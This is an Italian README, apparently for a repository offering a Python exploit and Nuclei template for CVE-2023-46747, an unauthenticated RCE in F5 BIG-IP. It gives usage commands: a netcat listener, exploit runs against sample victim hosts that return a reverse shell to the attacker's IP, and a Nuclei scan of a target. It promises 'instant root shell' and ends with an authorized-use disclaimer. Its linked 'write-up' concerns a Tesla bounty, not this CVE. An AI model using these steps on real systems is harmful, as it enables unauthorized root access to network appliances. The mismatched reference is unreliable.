
#F5-BIG-IP-CVE-2023-46747-Exploit – RCE non autenticata Exploit Python e template Nuclei di Raguraman ✓ Reverse shell TCP automatizzata (LHOST/LPORT) ✓ Testato sulle versioni interessate di BIG-IP 13.x–17.x ⚠️ Solo pentesting autorizzato
Versioni Python3 e Nuclei – di raguraman
RCE critico non autenticato (CVSS 9.8) tramite AJP + HTTP request smuggling
Funziona su tutti i BIG-IP 13.x → 17.x non aggiornati (inclusa l'ultima versione 17.1.0.3)
Patch: https://my.f5.com/manage/s/article/K000137353 (Nov 2023)
Write-up dell'exploit reale: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → Python3 autonomo (consigliato)CVE-2023-46747-revshell.yaml → template Nuclei (opzionale)# 1. Avvia il tuo listener
nc -lvnp 4444
# 2. Esegui l'exploit (funziona con IP o dominio)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 TUO_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com TUO_IP 4444
# → Shell root istantanea!
# 1. Modifica LHOST e LPORT all'interno del file YAML
# 2. Avvia il listener
nc -lvnp 4444
# 3. Scansiona
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati, come ad esempio:
Non utilizzare questo exploit su sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare. Lo sfruttamento non autorizzato è illegale e può comportare azioni penali.
Utilizzando questo strumento, accetti ogni responsabilità per la conformità alle leggi applicabili. L'autore non è responsabile per usi impropri o danni.